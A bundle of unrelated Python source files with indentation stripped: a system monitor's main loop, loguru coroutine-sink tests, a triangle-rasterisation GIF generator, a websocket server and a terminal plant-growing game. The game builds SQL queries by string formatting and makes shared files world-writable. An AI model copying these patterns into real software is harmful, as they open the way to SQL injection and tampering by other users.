pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
test_coroutine_sink.py
|
import asyncio
import logging
import multiprocessing
import re
import sys
import threading
import loguru
import pytest
from loguru import logger
async def async_writer(msg):
await asyncio.sleep(0.01)
print(msg, end="")
class AsyncWriter:
async def __call__(self, msg):
await asyncio.sleep(0.01)
print(msg, end="")
def test_coroutine_function(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_async_callable_sink(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(AsyncWriter(), format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_concurrent_execution(capsys):
async def task(i):
logger.debug("=> {}", i)
async def main():
tasks = [task(i) for i in range(10)]
await asyncio.gather(*tasks)
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(main())
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("=> %d" % i for i in range(10))
def test_recursive_coroutine(capsys):
async def task(i):
if i == 0:
await logger.complete()
return
logger.info("{}!", i)
await task(i - 1)
logger.add(async_writer, format="{message}")
asyncio.run(task(9))
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("%d!" % i for i in range(1, 10))
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_using_another_event_loop(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_run_mutiple_different_loops(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
logger.add(async_writer, format="{message}", loop=None)
asyncio.run(worker(1))
asyncio.run(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_run_multiple_same_loop(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker(1))
loop.run_until_complete(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
def test_using_sink_without_running_loop_not_none(capsys):
loop = asyncio.new_event_loop()
logger.add(sys.stderr, format="=> {message}")
logger.add(async_writer, format="{message}", loop=loop)
logger.info("A message")
loop.run_until_complete(logger.complete())
out, err = capsys.readouterr()
assert err == "=> A message\n"
assert out == "A message\n"
def test_using_sink_without_running_loop_none(capsys):
loop = asyncio.new_event_loop()
logger.add(sys.stderr, format="=> {message}")
logger.add(async_writer, format="{message}", loop=None)
logger.info("A message")
loop.run_until_complete(logger.complete())
out, err = capsys.readouterr()
assert err == "=> A message\n"
assert out == ""
def test_global_loop_not_used(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(sys.stderr, format="=> {message}")
logger.add(async_writer, format="{message}", loop=None)
logger.info("A message")
loop.run_until_complete(logger.complete())
out, err = capsys.readouterr()
assert err == "=> A message\n"
assert out == ""
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_complete_in_another_run(capsys):
async def worker_1():
logger.debug("A")
async def worker_2():
logger.debug("B")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker_1())
loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_tasks_cancelled_on_remove(capsys):
logger.add(async_writer, format="{message}", catch=False)
async def foo():
logger.info("A")
logger.info("B")
logger.info("C")
logger.remove()
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_remove_without_tasks(capsys):
logger.add(async_writer, format="{message}", catch=False)
logger.remove()
async def foo():
logger.info("!")
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_without_tasks(capsys):
logger.add(async_writer, catch=False)
async def worker():
await logger.complete()
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_stream_noop(capsys):
logger.add(sys.stderr, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_complete_file_noop(tmpdir):
filepath = tmpdir.join("test.log")
logger.add(str(filepath), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert filepath.read() == "A\nB\nC\nD\n"
def test_complete_function_noop():
out = ""
def write(msg):
nonlocal out
out += msg
logger.add(write, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert out == "A\nB\nC\nD\n"
def test_complete_standard_noop(capsys):
logger.add(logging.StreamHandler(sys.stderr), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_exception_in_coroutine_caught(capsys):
async def sink(msg):
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_not_caught(capsys, caplog):
async def sink(msg):
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
def test_exception_in_coroutine_during_complete_caught(capsys):
async def sink(msg):
await asyncio.sleep(0.1)
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_during_complete_not_caught(capsys, caplog):
async def sink(msg):
await asyncio.sleep(0.1)
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_enqueue_coroutine_loop(capsys):
loop = asyncio.new_event_loop()
logger.add(async_writer, enqueue=True, loop=loop, format="{message}", catch=False)
async def worker():
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_enqueue_coroutine_from_inside_coroutine_without_loop(capsys):
loop = asyncio.new_event_loop()
async def worker():
logger.add(async_writer, enqueue=True, loop=None, format="{message}", catch=False)
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_custom_complete_function(capsys):
awaited = False
class Handler:
def write(self, message):
print(message, end="")
async def complete(self):
nonlocal awaited
awaited = True
async def worker():
logger.info("A")
await logger.complete()
logger.add(Handler(), catch=False, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
assert awaited
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_complete_from_another_loop(capsys, loop_is_none):
main_loop = asyncio.new_event_loop()
second_loop = asyncio.new_event_loop()
loop = None if loop_is_none else main_loop
logger.add(async_writer, loop=loop, format="{message}")
async def worker_1():
logger.info("A")
async def worker_2():
await logger.complete()
main_loop.run_until_complete(worker_1())
second_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == err == ""
main_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_complete_from_multiple_threads_loop_is_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
logger.add(sink, catch=False, format="{message}")
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
def test_complete_from_multiple_threads_loop_is_not_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
loop = asyncio.new_event_loop()
logger.add(sink, catch=False, format="{message}", loop=loop)
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
async def async_subworker(logger_):
logger_.info("Child")
await logger_.complete()
async def async_mainworker(logger_):
logger_.info("Main")
await logger_.complete()
def subworker(logger_):
loop = asyncio.new_event_loop()
loop.run_until_complete(async_subworker(logger_))
class Writer:
def __init__(self):
self.output = ""
async def write(self, message):
self.output += message
def test_complete_with_sub_processes(monkeypatch, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
loop = asyncio.new_event_loop()
writer = Writer()
logger.add(writer.write, format="{message}", enqueue=True, loop=loop)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert out == err == ""
assert writer.output == "Child\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_invalid_coroutine_sink_if_no_loop_with_enqueue():
with pytest.raises(ValueError):
logger.add(async_writer, enqueue=True, loop=None)
|
GenGifs.py
|
import os
import subprocess
import multiprocessing
import numpy as np
import itertools
from PIL import Image
from PIL import ImageDraw
TestTriangle = (
( 5, 5),
(95,40),
(30,95)
)
# Barycentric method
def PointInTriangle( Point, Triangle ):
V0 = tuple(np.subtract(Triangle[2], Triangle[0]))
V1 = tuple(np.subtract(Triangle[1], Triangle[0]))
V2 = tuple(np.subtract(Point , Triangle[0]))
Dot00 = np.dot(V0, V0)
Dot01 = np.dot(V0, V1)
Dot02 = np.dot(V0, V2)
Dot11 = np.dot(V1, V1)
Dot12 = np.dot(V1, V2)
Area = (Dot00 * Dot11 - Dot01 * Dot01)
U = (Dot11 * Dot02 - Dot01 * Dot12)
V = (Dot00 * Dot12 - Dot01 * Dot02)
return (U >= 0) & (V >= 0) & (U + V < Area)
def chunks(List, Widths):
i = 0
for CurWidth in Widths:
while i + CurWidth < len(List):
yield List[i:i + CurWidth]
i += CurWidth
# Params:
# Name: Name of generated frames. Default "Serial"
# Path: Path for output images Default: "./frames/(Name)/"
# Size: Of the image, default (100,100)
# Scale: Scaling for the resulting image. Default: 2
# Granularity: List of widths in which elements may be processed in parallel
# Default: [1]
def RenderTriangle( Params ):
# Params
Name = Params.get("Name", "Serial")
Size = Params.get("Size", (100, 100))
Path = "./frames/" + Name + "/"
Scale = Params.get("Scale", 2)
Granularity = Params.get("Granularity", [1])
# Sort by largest to smallest
Granularity.sort()
Granularity.reverse()
# Create target path recursively
os.makedirs(Path, exist_ok=True)
# Create image
Img = Image.new('RGB', Size)
Draw = ImageDraw.Draw(Img)
# Generate each row of points up-front
Points = [
(x,y) for y in range(Size[1]) for x in range(Size[0])
]
i = 0
for CurPoints in chunks(Points,Granularity):
# Hilight the pixels being currently processed
# Hilight hits and misses
Hit = [(x,y) for (x,y) in CurPoints if PointInTriangle((x,y),TestTriangle)]
Miss = [(x,y) for (x,y) in CurPoints if not PointInTriangle((x,y),TestTriangle)]
Draw.point(
Hit,
fill=(0x00, 0xFF, 0x00)
)
Draw.point(
Miss,
fill=(0xFF, 0x00, 0x00)
)
Img.resize(
(Img.width * Scale, Img.height * Scale),
Image.NEAREST
).save(Path + Name + '_' + str(i).zfill(6) + ".png")
i += 1
# Save the "processed" frame
Draw.point(
Hit,
fill=(0xFF, 0xFF, 0xFF)
)
Draw.point(
Miss,
fill=(0x00, 0x00, 0x00)
)
Img.resize(
(Img.width * Scale, Img.height * Scale),
Image.NEAREST
).save(Path + Name + '_' + str(i).zfill(6) + ".png")
i += 1
subprocess.Popen(
[
'ffmpeg',
'-y',
'-framerate','50',
'-i', Path + Name + '_%06d.png',
Name + '.gif'
]
).wait()
Configs = [
# Serial
{
"Name": "Serial",
"Granularity": [1],
"Scale": 2,
"Size": (100, 100)
},
# SSE/NEON
{
"Name": "SSE-NEON",
"Granularity": [4,1],
"Scale": 2,
"Size": (100, 100)
},
# AVX2
{
"Name": "AVX2",
"Granularity": [8,4,1],
"Scale": 2,
"Size": (100, 100)
},
# AVX512
{
"Name": "AVX512",
"Granularity": [16,8,4,1],
"Scale": 2,
"Size": (100, 100)
}
]
Processes = [
multiprocessing.Process(
target=RenderTriangle, args=(Config,)
) for Config in Configs
]
for Process in Processes:
Process.start()
for Process in Processes:
Process.join()
|
websocket.py
|
# -*- coding:utf-8 -*-
import socket
# from multiprocessing import Process
from datetime import datetime
from websocket_server import WebsocketServer
from gsiot.v3 import *
from gsiot.v3.net.server import *
class webSockServer(gsIO):
def __init__(self,port,ip="0.0.0.0"):
gsIO.__init__(self,(ip,port))
self.ip=ip
self.port=port
self.istask=False
self.cmd=command_interpreter()
self.container=None
self.new_client=None
self.client_left=None
self.message_received=None
def __call__(self,cmdline,*argv,**keyargv):return self.do(cmdline,*argv,**keyargv)
def do(self,cmdline,*argv,**keyargv):
return self.cmd(cmdline,self if self.container==None else self.container,*argv,**keyargv)
def Open(self):
self.dev= WebsocketServer(self.port,self.ip)
self.dev.set_fn_new_client(self.new_client)
self.dev.set_fn_client_left(self.client_left)
self.dev.set_fn_message_received(self.message_received)
self.t=threading.Thread(target=self.dev.run_forever)
if __name__ != "lib.net.server.webserver.websocket" and __name__!="__main__":self.t.setDaemon(True)
self.t.start()
return True
def Close(self):
self.dev.close()
self.isOpen(False)
# except:pass #self.logservice("info","")
def send(self,msg,client=None):
# 组包
if msg!=None:
frame=edict()
if "cmd" in msg:frame.cmd=msg.cmd
if "type" in msg:frame.type=msg["type"]
frame.result=msg
frame.datetime=str(datetime.now())[:19]
if client!=None:
frame.id=client["id"]
try:self.dev.send_message(client,str(frame).replace("None","null").replace("True","true").replace("False","false").replace("u'","\"").replace("'","\""))
except:print str(frame)
else:self.dev.send_message_to_all(str(frame).replace("None","null").replace("True","true").replace("False","false").replace("u'","\"").replace("'","\""))
if __name__ == "__main__":
serv=webCommand(9503)
print serv.cmd.cmds
serv.Open()
|
botany.py
|
#!/usr/bin/env python3
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
'cursed',
'buff',
'narcotic',
'gnu/linux',
'abraxan', # rip dear friend
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2.0/3)*CONST_RARITY_MAX)
uncommon_range = round((2.0/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2.0/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2.0/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
for name in (visitor_names):
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name))
data=c.fetchone()
if data is None:
sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name)
c.execute(sql)
else:
sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name)
c.execute(sql)
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] <= int(time.time() and element['timestamp'] >= self.watered_timestamp):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0o666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
# TODO: this considers a plant watered only on day 1 and day 4 to be
# watered for all 4 days - need to figure out how to only add score
# from 24h after each watered timestamp
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Increase plant growth stage
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_watered = this_plant.water_check()
is_dead = this_plant.dead_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0o777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0o666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0o666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# try to insert or replace
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (
'{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead}
)
""".format(pid = this_plant.plant_id,
pown = this_plant.owner,
pdes = this_plant.parse_plant(),
page = age_formatted,
psco = str(this_plant.ticks),
pdead = int(this_plant.dead))
c.execute(update_query)
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
